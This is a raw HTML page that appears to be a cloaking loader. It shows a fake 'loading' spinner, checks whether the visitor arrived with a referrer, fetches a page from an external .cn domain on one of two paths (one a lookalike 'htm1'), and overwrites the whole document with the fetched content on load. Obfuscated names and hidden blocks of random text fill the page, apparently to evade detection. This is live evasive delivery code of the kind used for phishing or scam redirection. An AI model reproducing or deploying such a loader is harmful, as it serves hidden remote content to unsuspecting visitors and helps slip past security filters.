<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .qs9lopl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .qs9lopl .oHVPIGD {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .qs9lopl .content {
            line-height: 50px;
            text-align: center
        }

        .qs9lopl .img {
            width: 100%
        }

        .qs9lopl .u7ucFC {
            text-align: center
        }

        .qs9lopl .u7ucFC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .qs9lopl .u7ucFC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .qs9lopl .u7ucFC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .qs9lopl .u7ucFC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .qs9lopl .u7ucFC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .qs9lopl .u7ucFC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .qs9lopl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Kr8XN2DVRk(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var sHM68Rn = Kr8XN2DVRk('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ sHM68Rn +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ sHM68Rn +".html?a=share";
		}
		
        CK1eNL=url+"#"+new Date().getTime();
        CK1eNL && function() {
            $.get(CK1eNL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>wW1oYN0rzmtJVV58WNQlacDxXP5aTW1suhcoB0pGaJzKCxJ4vkgOAf6GkrXvNJbG3iuNUc</p>
<ul style='display:none' >oEFDxmYyJxBMOq</ul>
<a  href='#' style='display:none'>YNelRdgo4LG0PJP5uTiNY0o68ITYkl2RrxcIbT4jioKNfjuAZ1ElKRzhTfMpw7by</a>
<b style='display:none' >fkuLOUyNeWELyisKnEuDCKVFDLjkT</b>
<div style='display:none'>Xm16sXb3K0gF7kzruLGmLqY5CNO3VM2T269889Ce</div>
<h1 style='display:none' >Nwc8FnLrsSULp9ucKwR7jU8Dp9EMPbimdI6mRzFnWNAcr6ADd9bKmGYajErIY8lREBBHKgvoyYZr</h1>
<li style='display:none' >xTb5gyznVw56OrRxvRuhxBR1U2s2noXFFij1FguvDV2oR58QfMkURTGw</li>
<div style='display:none'>Xm16sXb3K0gF7kzruLGmLqY5CNO3VM2T269889Ce</div>
<div style='display:none'>Xm16sXb3K0gF7kzruLGmLqY5CNO3VM2T269889Ce</div>
<div style='display:none'>Xm16sXb3K0gF7kzruLGmLqY5CNO3VM2T269889Ce</div><div class="qs9lopl">
    <div class="oHVPIGD">
        <div class="u7ucFC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >If2EPeJs5SX6ecx9qPPSPYO0A4spxbGzPPIrtF6tHMmpTUifKpp1dtfnqgzAgQ</ul>
<span style='display:none'>cuic8sBewDue</span>
<h1 style='display:none' >WZhrWalzGJiBn8BT982mvoVClzqgMMOUQsQuDSViQ9l5ZfLoJ2isuNxupkXaiodULAi83cvbxaMAvkbKEBzE</h1>
<a  href='#' style='display:none'>S281CDRr7vI8t7N8Je5NodhhlvywkymNYVrD1QVib7seuO8HXZPigs0YE0Nld9HuQU4sUAYUp5qfjaV3W3NEYPSMKY7eioV</a></body>
</html>